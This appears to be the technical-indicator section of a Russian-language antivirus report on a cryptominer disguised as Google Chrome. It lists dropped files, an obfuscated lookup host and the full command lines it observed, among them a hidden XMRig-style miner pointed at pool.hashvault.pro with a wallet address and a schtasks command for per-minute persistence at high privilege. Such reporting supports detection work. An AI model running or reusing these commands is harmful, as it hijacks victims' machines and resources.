Техническая информация
- <SYSTEM32>\tasks\google chrome
- %WINDIR%\explorer.exe
- %ALLUSERSPROFILE%\google\chrome.exe
- %TEMP%\winring0x64.sys
- 'ht##bin.org':80
- http://ht##bin.org/ip
- DNS ASK ht##bin.org
- '%ALLUSERSPROFILE%\google\chrome.exe'
- '%WINDIR%\explorer.exe' --donate-level 0 --cpu-max-threads-hint 40 -o pool.hashvault.pro:80 -u 42WhnkabS9rLXX2wKTcJZB3etQPYgvQU3ZAC71QsH3Q9PkEDqS4sCD5azwsPtwPdeLSPXFkWUMSS2hmUsRoPhWaAKcPUyoC -p magic-cpu' (со скрытым окном)
- '%ALLUSERSPROFILE%\google\chrome.exe' ' (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /sc minute /mo 1 /tn "Google Chrome" /rl HIGHEST /tr %ALLUSERSPROFILE%\Google\chrome.exe
- '%WINDIR%\explorer.exe' --donate-level 0 --cpu-max-threads-hint 40 -o pool.hashvault.pro:80 -u 42WhnkabS9rLXX2wKTcJZB3etQPYgvQU3ZAC71QsH3Q9PkEDqS4sCD5azwsPtwPdeLSPXFkWUMSS2hmUsRoPhWaAKcPUyoC -p magic-cpu
- '<SYSTEM32>\taskeng.exe' {41447FEC-053B-462A-9118-2C82223E13B0} S-1-5-21-1960123792-2022915161-3775307078-1001:pebxpodk\user:Interactive:[1]